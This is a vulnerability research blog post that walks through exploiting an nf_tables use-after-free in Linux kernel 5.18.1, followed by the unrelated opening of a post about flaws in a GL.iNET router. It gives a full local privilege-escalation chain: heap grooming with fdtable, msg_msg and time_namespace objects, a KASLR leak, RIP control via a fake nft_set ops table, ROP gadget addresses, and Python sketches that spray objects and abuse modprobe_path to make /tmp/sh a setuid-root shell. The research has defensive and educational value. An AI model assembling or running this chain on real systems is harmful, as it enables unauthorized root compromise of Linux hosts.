In 5.18.1, the object involved in the use-after-free vulnerability, nft_expr, is itself allocated with GFP_KERNEL_ACCOUNT in the kmalloc-cg-* slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with GFP_KERNEL, they do not work against the latest vulnerable version of the Linux kernel.

The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.

Vulnerability

Netfilter sets can be created with a maximum of two associated expressions that have the NFT_EXPR_STATEFUL flag. The vulnerability occurs when a set is created with an associated expression that does not have the NFT_EXPR_STATEFUL flag, such as the dynset and lookup expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.

During the allocation of the associated dynset or lookup expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the NFT_EXPR_STATEFUL flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process, where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.

Exploitation

Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability: nft_set, nft_expr, nft_lookup, and nft_dynset.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L502

struct nft_set {
        struct list_head           list;                 /*     0    16 */
        struct list_head           bindings;             /*    16    16 */
        struct nft_table *         table;                /*    32     8 */
        possible_net_t             net;                  /*    40     8 */
        char *                     name;                 /*    48     8 */
        u64                        handle;               /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        u32                        ktype;                /*    64     4 */
        u32                        dtype;                /*    68     4 */
        u32                        objtype;              /*    72     4 */
        u32                        size;                 /*    76     4 */
        u8                         field_len[16];        /*    80    16 */
        u8                         field_count;          /*    96     1 */

        /* XXX 3 bytes hole, try to pack */

        u32                        use;                  /*   100     4 */
        atomic_t                   nelems;               /*   104     4 */
        u32                        ndeact;               /*   108     4 */
        u64                        timeout;              /*   112     8 */
        u32                        gc_int;               /*   120     4 */
        u16                        policy;               /*   124     2 */
        u16                        udlen;                /*   126     2 */
        /* --- cacheline 2 boundary (128 bytes) --- */
        unsigned char *            udata;                /*   128     8 */

        /* XXX 56 bytes hole, try to pack */

        /* --- cacheline 3 boundary (192 bytes) --- */
        const struct nft_set_ops  * ops __attribute__((__aligned__(64))); /*   192     8 */
        u16                        flags:14;             /*   200: 0  2 */
        u16                        genmask:2;            /*   200:14  2 */
        u8                         klen;                 /*   202     1 */
        u8                         dlen;                 /*   203     1 */
        u8                         num_exprs;            /*   204     1 */

        /* XXX 3 bytes hole, try to pack */

        struct nft_expr *          exprs[2];             /*   208    16 */
        struct list_head           catchall_list;        /*   224    16 */
        unsigned char              data[] __attribute__((__aligned__(8))); /*   240     0 */

        /* size: 256, cachelines: 4, members: 29 */
        /* sum members: 176, holes: 3, sum holes: 62 */
        /* sum bitfield members: 16 bits (2 bytes) */
        /* padding: 16 */
        /* forced alignments: 2, forced holes: 1, sum forced holes: 56 */
} __attribute__((__aligned__(64)));

The nft_set structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L347

/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */
struct nft_expr {
	const struct nft_expr_ops	*ops;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(u64))));
};

The nft_expr structure is a generic container for expressions. The specific expression data is stored within its data member. For this particular vulnerability the relevant expressions are nft_lookup and nft_dynset, which are used to perform lookups on sets or update dynamic sets, respectively.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_lookup.c#L18

struct nft_lookup {
        struct nft_set *           set;                  /*     0     8 */
        u8                         sreg;                 /*     8     1 */
        u8                         dreg;                 /*     9     1 */
        bool                       invert;               /*    10     1 */

        /* XXX 5 bytes hole, try to pack */

        struct nft_set_binding     binding;              /*    16    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 48, cachelines: 1, members: 5 */
        /* sum members: 43, holes: 1, sum holes: 5 */
        /* paddings: 1, sum paddings: 4 */
        /* last cacheline: 48 bytes */
};

nft_lookup expressions have to be bound to a given set on which the lookup operations are performed.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_dynset.c#L15

struct nft_dynset {
        struct nft_set *           set;                  /*     0     8 */
        struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */

        /* XXX last struct has 1 byte of padding */

        enum nft_dynset_ops        op:8;                 /*    20: 0  4 */

        /* Bitfield combined with next fields */

        u8                         sreg_key;             /*    21     1 */
        u8                         sreg_data;            /*    22     1 */
        bool                       invert;               /*    23     1 */
        bool                       expr;                 /*    24     1 */
        u8                         num_exprs;            /*    25     1 */

        /* XXX 6 bytes hole, try to pack */

        u64                        timeout;              /*    32     8 */
        struct nft_expr *          expr_array[2];        /*    40    16 */
        struct nft_set_binding     binding;              /*    56    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 88, cachelines: 2, members: 11 */
        /* sum members: 81, holes: 1, sum holes: 6 */
        /* sum bitfield members: 8 bits (1 bytes) */
        /* paddings: 2, sum paddings: 5 */
        /* last cacheline: 24 bytes */
};

nft_dynset expressions have to be bound to a given set on which the add, delete, or update operations will be performed.

When a given nft_set has expressions bound to it, they are added to the nft_set.bindings double linked list. A visual representation of an nft_set with 2 expressions is shown in the diagram below.

The binding member of the nft_lookup and nft_dynset expressions is defined as follows:

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576

/**
 *	struct nft_set_binding - nf_tables set binding
 *
 *	@list: set bindings list node
 *	@chain: chain containing the rule bound to the set
 *	@flags: set action flags
 *
 *	A set binding contains all information necessary for validation
 *	of new elements added to a bound set.
 */
struct nft_set_binding {
	struct list_head		list;
	const struct nft_chain		*chain;
	u32				flags;
};

The important member in our case is the list member. It is of type struct list_head, the same as the nft_lookup.binding and nft_dynset.binding members. These are the foundation for building a double linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented, refer to this article.

With this information, let’s see what the vulnerability allows us to do. Since the UAF occurs within a double linked list, let’s review the common operations on them and what they imply in our scenario. Instead of showing a generic example, we are going to use the linked list that is built with the nft_set and the expressions that can be bound to it.

In the diagram shown above, the simplified pseudo-code for removing the nft_lookup expression from the list would be:

nft_lookup.binding.list->prev->next = nft_lookup.binding.list->next
nft_lookup.binding.list->next->prev = nft_lookup.binding.list->prev

This code effectively writes the address of nft_dynset.binding in nft_set.bindings.next, and the address of nft_set.bindings in nft_dynset.binding.list->prev. Since the binding member of the nft_lookup and nft_dynset expressions is defined at different offsets, the write operation is done at different offsets.

With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:

  • nft_lookup: Write an 8-byte address at offset 24 (binding.list->next) or offset 32 (binding.list->prev) of a freed nft_lookup object.
  • nft_dynset: Write an 8-byte address at offset 64 (binding.list->next) or offset 72 (binding.list->prev) of a freed nft_dynset object.

The offsets mentioned above take into account the fact that nft_lookup and nft_dynset expressions are bundled in the data member of an nft_expr object (the data member is at offset 8).

In order to do something useful with the limited write primitives that the vulnerability offers, we need to find objects allocated within the same slab caches as the nft_lookup and nft_dynset expression objects that have an interesting member at the listed offsets.

As mentioned before, in Linux kernel 5.18.1 the nft_expr objects are allocated using the GFP_KERNEL_ACCOUNT flag, as shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nf_tables_api.c#L2866

static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
				      const struct nlattr *nla)
{
	struct nft_expr_info expr_info;
	struct nft_expr *expr;
	struct module *owner;
	int err;

	err = nf_tables_expr_parse(ctx, nla, &expr_info);
	if (err < 0)
            goto err1;
        err = -ENOMEM;

        expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT);
	if (expr == NULL)
	    goto err2;

	err = nf_tables_newexpr(ctx, &expr_info, expr);
	if (err < 0)
            goto err3;

        return expr;
err3:
        kfree(expr);
err2:
        owner = expr_info.ops->type->owner;
	if (expr_info.ops->type->release_ops)
	    expr_info.ops->type->release_ops(expr_info.ops);

	module_put(owner);
err1:
	return ERR_PTR(err);
}

Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targeting versions 5.13 and 5.15.

Exploit Strategy

The ultimate primitives we need to exploit this vulnerability are the following:

  • Memory leak primitive: Mainly to defeat KASLR.
  • RIP control primitive: To achieve kernel code execution and escalate privileges.

However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the nft_set, nft_lookup, or nft_dynset objects.

Partially freeing nft_lookup and nft_dynset objects can help with leaking pointers, while partially freeing an nft_set object can be pretty useful to craft a partial fake nft_set to achieve RIP control, since it has an ops member that points to a function table.

Therefore, the high-level exploitation strategy would be the following:

  1. Leak the kernel image base address.
  2. Leak a pointer to an nft_set object.
  3. Obtain RIP control.
  4. Escalate privileges by overwriting the kernel’s MODPROBE_PATH global variable.
  5. Return execution to userland and drop a root shell.

The following sub-sections describe how this can be achieved.

Partial Object Free Primitive

A partial object free primitive can be built by looking for a kernel object allocated with GFP_KERNEL_ACCOUNT within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offset 24 or 32 for kmalloc-cg-64, or at offset 64 or 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed, kfree() has to be called on that pointer in order to partially free the targeted object.

One such object is the fdtable object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27

struct fdtable {
        unsigned int               max_fds;              /*     0     4 */

        /* XXX 4 bytes hole, try to pack */

        struct file * *            fd;                   /*     8     8 */
        long unsigned int *        close_on_exec;        /*    16     8 */
        long unsigned int *        open_fds;             /*    24     8 */
        long unsigned int *        full_fds_bits;        /*    32     8 */
        struct callback_head       rcu __attribute__((__aligned__(8))); /*    40    16 */

        /* size: 56, cachelines: 1, members: 6 */
        /* sum members: 52, holes: 1, sum holes: 4 */
        /* forced alignments: 1 */
        /* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));

The size of an fdtable object is 56 bytes, so it is allocated in the kmalloc-cg-64 slab and thus can be used to replace nft_lookup objects. It has a member of interest at offset 24 (open_fds), which is a pointer to an unsigned long integer array. The allocation of fdtable objects is done by the kernel function alloc_fdtable(), which can be reached with the following call stack.

alloc_fdtable()
 |  
 +- dup_fd()
    |
    +- copy_files()
      |
      +- copy_process()
        |
        +- kernel_clone()
          |
          +- fork() syscall

Therefore, by calling the fork() system call, the current process is copied along with its currently open files. This is done by allocating a new file descriptor table object (fdtable), if required, and copying the currently open file descriptors to it. The allocation of a new fdtable object only happens when the number of open file descriptors exceeds NR_OPEN_DEFAULT, which is defined as 64 on 64-bit machines. The following listing shows this check.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L316

/*
 * Allocate a new files structure and copy contents from the
 * passed in files structure.
 * errorp will be valid only when the returned files_struct is NULL.
 */
struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int *errorp)
{
        struct files_struct *newf;
        struct file **old_fds, **new_fds;
        unsigned int open_files, i;
        struct fdtable *old_fdt, *new_fdt;

        *errorp = -ENOMEM;
        newf = kmem_cache_alloc(files_cachep, GFP_KERNEL);
        if (!newf)
                goto out;

        atomic_set(&newf->count, 1);

        spin_lock_init(&newf->file_lock);
        newf->resize_in_progress = false;
        init_waitqueue_head(&newf->resize_wait);
        newf->next_fd = 0;
        new_fdt = &newf->fdtab;

[1]

        new_fdt->max_fds = NR_OPEN_DEFAULT;
        new_fdt->close_on_exec = newf->close_on_exec_init;
        new_fdt->open_fds = newf->open_fds_init;
        new_fdt->full_fds_bits = newf->full_fds_bits_init;
        new_fdt->fd = &newf->fd_array[0];

        spin_lock(&oldf->file_lock);
        old_fdt = files_fdtable(oldf);
        open_files = sane_fdtable_size(old_fdt, max_fds);

        /*
         * Check whether we need to allocate a larger fd array and fd set.
         */

[2]

        while (unlikely(open_files > new_fdt->max_fds)) {
                spin_unlock(&oldf->file_lock);

                if (new_fdt != &newf->fdtab)
                        __free_fdtable(new_fdt);

[3]

                new_fdt = alloc_fdtable(open_files - 1);
                if (!new_fdt) {
                        *errorp = -ENOMEM;
                        goto out_release;
                }

[Truncated]

        }

[Truncated]

        return newf;

out_release:
        kmem_cache_free(files_cachep, newf);
out:
        return NULL;
}

At [1] the max_fds member of new_fdt is set to NR_OPEN_DEFAULT. Afterwards, at [2] the loop executes only when the number of open files exceeds the max_fds value. If the loop executes, at [3] a new fdtable object is allocated via the alloc_fdtable() function.

Therefore, to force the allocation of fdtable objects in order to replace a given free object from kmalloc-cg-64, the following steps must be taken:

  1. Create more than 64 open file descriptors. This can be easily done by calling the dup() function to duplicate an existing file descriptor, such as stdout. This step should be done before triggering the free of the object to be replaced with an fdtable object, since the dup() system call also ends up allocating fdtable objects that can interfere.
  2. Once the target object has been freed, fork the current process a large number of times. Each fork() execution creates one fdtable object.

The free of the open_fds pointer is triggered when the fdtable object is destroyed in the __free_fdtable() function.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L34

static void __free_fdtable(struct fdtable *fdt)
{
        kvfree(fdt->fd);
        kvfree(fdt->open_fds);
        kfree(fdt);
}

Therefore, the partial free via the overwritten open_fds pointer can be triggered by simply terminating the child process that allocated the fdtable object.
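Putting these pieces together, a minimal userland sketch of the spray and the partial free trigger could look as follows (my own illustration in Python; the original exploit code is not reproduced here):

import os
import signal
import time

# Step 1: exceed NR_OPEN_DEFAULT (64) before the target object is freed
for _ in range(65):
    os.dup(1)

# ... trigger the free of the target kmalloc-cg-64 object here ...

# Step 2: each fork() now allocates a fresh fdtable in kmalloc-cg-64
children = []
for _ in range(512):
    pid = os.fork()
    if pid == 0:
        time.sleep(3600)   # child: keep the fdtable allocation alive
        os._exit(0)
    children.append(pid)

# Later: terminating a child runs __free_fdtable(), which kfree()s
# whatever its (possibly corrupted) open_fds pointer references
for pid in children:
    os.kill(pid, signal.SIGKILL)
    os.waitpid(pid, 0)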

Leaking Pointers

The exploit primitive provided by this vulnerability can be used to build a leak primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message, represented by the msg_msg structure, which is allocated in the kmalloc-cg-* slab caches starting from kernel version 5.14.

The msg_msg structure acts as a header of System V messages that can be created via the userland msgsnd() function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/msg.h#L9

struct msg_msg {
        struct list_head           m_list;               /*     0    16 */
        long int                   m_type;               /*    16     8 */
        size_t                     m_ts;                 /*    24     8 */
        struct msg_msgseg *        next;                 /*    32     8 */
        void *                     security;             /*    40     8 */

        /* size: 48, cachelines: 1, members: 5 */
        /* last cacheline: 48 bytes */
};

Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.
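As an illustration, System V messages of a chosen size can be sprayed and read back from userland without any helper libraries. The following is a minimal sketch (an assumption-laden reconstruction of the technique, not the original exploit code): the struct msg_msg header is 48 bytes, so 48 bytes of message text lands the total allocation in kmalloc-cg-96, while 16 bytes of text would land it in kmalloc-cg-64.

import ctypes

libc = ctypes.CDLL(None, use_errno=True)
IPC_CREAT = 0o1000  # from <sys/ipc.h>

class Msg(ctypes.Structure):
    # mtype is mandatory; mtext is the data that follows the 48-byte
    # struct msg_msg header inside the kernel allocation
    _fields_ = [("mtype", ctypes.c_long), ("mtext", ctypes.c_char * 48)]

def spray_msg(count, tag, tag_offset):
    """Create one queue per message and send a tagged 48-byte message."""
    qids = []
    for _ in range(count):
        qid = libc.msgget(0, 0o666 | IPC_CREAT)  # key 0 == IPC_PRIVATE
        data = bytearray(48)
        data[tag_offset:tag_offset + len(tag)] = tag
        msg = Msg(mtype=1, mtext=bytes(data))
        libc.msgsnd(qid, ctypes.byref(msg), 48, 0)
        qids.append(qid)
    return qids

def read_msg(qid):
    """Read the message back with msgrcv() to inspect overwritten tags."""
    msg = Msg()
    libc.msgrcv(qid, ctypes.byref(msg), 48, 0, 0)
    return bytes(msg.mtext)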

It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the msg_msg header. This restriction discards the nft_lookup object as a candidate to apply this technique to, as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability to overwrite the msg_msg.m_ts member, which defines the size of the message, helps build a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the m_ts member is not negative when interpreted as a signed long integer, and heap addresses start with 0xffff, making them negative long integers.

Leaking an nft_set Pointer

Leaking a pointer to an nft_set object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:

1. Create a target set where the expressions will be bound to.

2. Create a rule with a lookup expression bound to the target set from step 1.

3. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded in a set, the nft_dynset object will be freed but not removed from the target set’s bindings list, causing a UAF.

4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via the msgsnd() function). Tag all the messages at offset 24 so the one corrupted with the nft_set pointer can later be identified.

5. Remove the rule created, which will remove the entry of the nft_lookup expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target nft_set object where the original binding.list.prev member was (offset 72). Since the freed nft_dynset object was replaced by a System V message, the pointer to the nft_set will be written at offset 24 within the message data.

6. Use the userland msgrcv() function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the nft_set.

Leaking a Kernel Function Pointer

Leaking a kernel pointer requires a bit more work than leaking a pointer to an nft_set object. It requires being able to partially free objects within the target set’s bindings list as a means of crafting use-after-free conditions. This can be done with the partial object free primitive based on the fdtable object already described. The steps followed to leak a pointer to a kernel function are the following.

1. Increase the number of open file descriptors by calling dup() on stdout 65 times.

2. Create a target set where the expressions will be bound to (different from the one used in the nft_set address leak).

3. Create a set with an embedded nft_lookup expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_lookup object will be freed but not removed from the target set bindings list, causing a UAF.

4. Spray fdtable objects in order to replace the freed nft_lookup from step 3.

5. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_dynset object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the open_fds member of the fdtable object (allocated in step 4) that replaced the nft_lookup object.

6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via the msgsnd() function). Tag all the messages at offset 8 so the one corrupted can be identified.

7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the nft_dynset object, effectively causing a UAF to a part of a System V message.

8. Spray time_namespace objects in order to replace the partially freed System V message allocated in step 7. The reason for using the time_namespace objects is explained later.

9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use msgrcv() to read the data from it, which overlaps with the newly allocated time_namespace object. Offset 40 of the data portion of the System V message corresponds to the time_namespace.ns->ops member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel image base to this function table, it is possible to calculate the kernel image base address.

10. Clean up the child processes used to spray the time_namespace objects.

time_namespace objects are interesting because they contain an ns_common structure embedded in them, which in turn contains an ops member that points to a function table with functions defined within the kernel core. The time_namespace structure definition is listed below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/time_namespace.h#L19

struct time_namespace {
        struct user_namespace *    user_ns;              /*     0     8 */
        struct ucounts *           ucounts;              /*     8     8 */
        struct ns_common           ns;                   /*    16    24 */
        struct timens_offsets      offsets;              /*    40    32 */
        /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */
        struct page *              vvar_page;            /*    72     8 */
        bool                       frozen_offsets;       /*    80     1 */

        /* size: 88, cachelines: 2, members: 6 */
        /* padding: 7 */
        /* last cacheline: 24 bytes */
};

At offset 16, the ns member is found. It is an ns_common structure, whose definition is the following.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/ns_common.h#L9

struct ns_common {
        atomic_long_t              stashed;              /*     0     8 */
        const struct proc_ns_operations  * ops;          /*     8     8 */
        unsigned int               inum;                 /*    16     4 */
        refcount_t                 count;                /*    20     4 */

        /* size: 24, cachelines: 1, members: 4 */
        /* last cacheline: 24 bytes */
};

At offset 8 within the ns_common structure the ops member is found. Therefore, time_namespace.ns->ops is at offset 24.

Spraying time_namespace objects can be done by calling the unshare() system call and providing the CLONE_NEWUSER and CLONE_NEWTIME flags. In order to avoid altering the execution of the current process, the unshare() executions can be done in separate processes created via fork().

clone_time_ns()
  |
  +- copy_time_ns()
    |
    +- create_new_namespaces()
      |
      +- unshare_nsproxy_namespaces()
        |
        +- unshare() syscall

The CLONE_NEWTIME flag is required because of a check in the function copy_time_ns() (listed below), and CLONE_NEWUSER is required to be able to use the CLONE_NEWTIME flag as an unprivileged user.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/kernel/time/namespace.c#L133

/**
 * copy_time_ns - Create timens_for_children from @old_ns
 * @flags:      Cloning flags
 * @user_ns:    User namespace which owns a new namespace.
 * @old_ns:     Namespace to clone
 *
 * If CLONE_NEWTIME specified in @flags, creates a new timens_for_children;
 * adds a refcounter to @old_ns otherwise.
 *
 * Return: timens_for_children namespace or ERR_PTR.
 */
struct time_namespace *copy_time_ns(unsigned long flags,
        struct user_namespace *user_ns, struct time_namespace *old_ns)
{
        if (!(flags & CLONE_NEWTIME))
                return get_time_ns(old_ns);

        return clone_time_ns(user_ns, old_ns);
}
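A minimal sketch of this spray (my own illustration; the clone flag values are taken from include/uapi/linux/sched.h):

import ctypes
import os
import time

libc = ctypes.CDLL(None, use_errno=True)
CLONE_NEWTIME = 0x00000080   # include/uapi/linux/sched.h
CLONE_NEWUSER = 0x10000000

def spray_time_namespaces(count):
    """Each child unshares into a new time namespace, allocating one
    time_namespace object (timens_for_children) in kmalloc-cg-96."""
    children = []
    for _ in range(count):
        pid = os.fork()
        if pid == 0:
            if libc.unshare(CLONE_NEWUSER | CLONE_NEWTIME) != 0:
                os._exit(1)
            time.sleep(3600)  # keep the namespace object alive
            os._exit(0)
        children.append(pid)
    return children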

RIP Control

Achieving RIP control is relatively easy with the partial object free primitive. This primitive can be used to partially free an nft_set object whose address is known and replace it with a fake nft_set object created with a System V message. The nft_set objects contain an ops member, which is a function table of type nft_set_ops. Crafting this function table and triggering the right call will lead to RIP control.

The following is the definition of the nft_set_ops structure.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L389

struct nft_set_ops {
        bool                       (*lookup)(const struct net  *, const struct nft_set  *, const u32  *, const struct nft_set_ext  * *); /*     0     8 */
        bool                       (*update)(struct nft_set *, const u32  *, void * (*)(struct nft_set *, const struct nft_expr  *, struct nft_regs *), const struct nft_expr  *, struct nft_regs *, const struct nft_set_ext  * *); /*     8     8 */
        bool                       (*delete)(const struct nft_set  *, const u32  *); /*    16     8 */
        int                        (*insert)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, struct nft_set_ext * *); /*    24     8 */
        void                       (*activate)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    32     8 */
        void *                     (*deactivate)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    40     8 */
        bool                       (*flush)(const struct net  *, const struct nft_set  *, void *); /*    48     8 */
        void                       (*remove)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        void                       (*walk)(const struct nft_ctx  *, struct nft_set *, struct nft_set_iter *); /*    64     8 */
        void *                     (*get)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, unsigned int); /*    72     8 */
        u64                        (*privsize)(const struct nlattr  * const *, const struct nft_set_desc  *); /*    80     8 */
        bool                       (*estimate)(const struct nft_set_desc  *, u32, struct nft_set_estimate *); /*    88     8 */
        int                        (*init)(const struct nft_set  *, const struct nft_set_desc  *, const struct nlattr  * const *); /*    96     8 */
        void                       (*destroy)(const struct nft_set  *); /*   104     8 */
        void                       (*gc_init)(const struct nft_set  *); /*   112     8 */
        unsigned int               elemsize;             /*   120     4 */

        /* size: 128, cachelines: 2, members: 16 */
        /* padding: 4 */
};

The delete member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria are matched. Using the nft command, a very simple example is as follows:

nft add table inet test_dynset
nft add chain inet test_dynset my_input_chain { type filter hook input priority 0\;}
nft add set inet test_dynset my_set { type ipv4_addr\; }
nft add rule inet test_dynset my_input_chain ip saddr 127.0.0.1 delete @my_set { 127.0.0.1 }

The snippet above shows the creation of a table, a chain, and a set that contains elements of type ipv4_addr (i.e. IPv4 addresses). Then a rule is added, which deletes the item 127.0.0.1 from the set my_set when an incoming packet has the source IPv4 address 127.0.0.1. Whenever a packet matching that criteria is processed via nftables, the delete function pointer of the specified set is called.

Therefore, RIP control can be achieved with the following steps. Consider the target set to be the nft_set object whose address was already obtained.

  1. Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 127.0.0.1.
  2. Partially free the nft_set object from which the address was obtained.
  3. Spray System V messages containing a partially fake nft_set object with a fake ops table, with a given value for the ops->delete member.
  4. Trigger the call of nft_set->ops->delete by locally sending a network packet to 127.0.0.1. This can be done by simply opening a TCP socket to 127.0.0.1 at any port and issuing a connect() call (a minimal sketch follows this list).
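For instance, the trigger from step 4 can be as simple as the sketch below; whether the port is open does not matter, since the SYN packet still traverses the netfilter input hook and fires the rule:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
try:
    s.connect(("127.0.0.1", 1337))  # arbitrary port; the SYN fires the rule
except (ConnectionRefusedError, socket.timeout):
    pass
finally:
    s.close()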

Escalating Privileges

Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.

A way of achieving this is as follows:

  1. Pivot the stack to a memory area under control. When the delete function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of these registers can be controlled by adding an immediate expression in the rule created to achieve RIP control.
  2. Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the MODPROBE_PATH global variable, pivot the stack again to the end of the fake nft_set used for RIP control.
  3. Build a ROP chain to overwrite the MODPROBE_PATH global variable. Place it at the end of the nft_set mentioned in step 2.
  4. Return to userland by using the KPTI trampoline.
  5. Drop to a privileged shell by leveraging the overwritten MODPROBE_PATH global variable.

The stack pivot gadgets and ROP chain used can be found below.

// ROP gadget to pivot the stack to the nftables registers memory area

0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;


// ROP gadget to pivot the stack to the memory allocation holding the target nft_set

0xffffffff810b08f1: pop rsp ; ret ;

When the execution flow is redirected, the RSI register contains the address of the nftables registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake nft_set object.

// ROP chain used to overwrite the MODPROBE_PATH global variable

0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;

It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.
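The userland half of step 5 is the classic modprobe_path trick. A minimal sketch follows (my own illustration, assuming the ROP chain wrote /tmp/x into modprobe_path and that a copy of a shell was placed at /tmp/sh beforehand):

import os
import subprocess

# Payload executed by the kernel's usermode helper (as root);
# assumes /tmp/sh is a copy of /bin/sh placed there beforehand
with open("/tmp/x", "w") as f:
    f.write("#!/bin/sh\nchown root:root /tmp/sh\nchmod 4755 /tmp/sh\n")
os.chmod("/tmp/x", 0o755)

# A file with a bogus magic number: execve() finds no binfmt handler,
# so the kernel invokes modprobe_path (now /tmp/x) as root
with open("/tmp/trigger", "wb") as f:
    f.write(b"\xff\xff\xff\xff")
os.chmod("/tmp/trigger", 0o755)
try:
    subprocess.run("/tmp/trigger")
except OSError:
    pass  # "Exec format error" is expected; the helper has already run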

Wrapping Up

We hope you enjoyed this read and learned something new. If you are hungry for more, make sure to check our other blog posts.

We wish y’all great Christmas holidays and a happy new year! Here’s to a 2023 with more bugs, exploits, and write-ups!

Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router

Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router

Original text by Olivier Laflamme

I’ve really enjoyed reversing cheap/weird IoT devices in my free time. In early May of 2022, I went on an Amazon/AliExpress shopping spree and purchased ~15 cheap IoT devices. Among them was this mini portable router by GL.iNET.  

GL.iNET is a leading developer of OpenWrt Wi-Fi and IoT network solutions and, to my knowledge, is a Chinese company based out of Hong Kong & the USA. They offer a wide variety of products, and the company’s official website is www.gl-inet.com. The GL-MT300N-V2 firmware version I dove into was V3.212, released on April 29th, 2022 for the Mango model. The goodcloud remote cloud management gateway was Version 1.00.220412.00.

This blog will be separated into two sections. The first half covers software vulnerabilities, including the local web application and the remote cloud peripherals. The second mainly consists of an attempted hardware teardown.

I like to give credit where credit is due. The GL.iNET team was really awesome to work & communicate with. They genuinely care about the security posture of their products. So I'd like to give some quick praise for being an awesome vendor that kept me in the loop throughout the patching/disclosure process.  

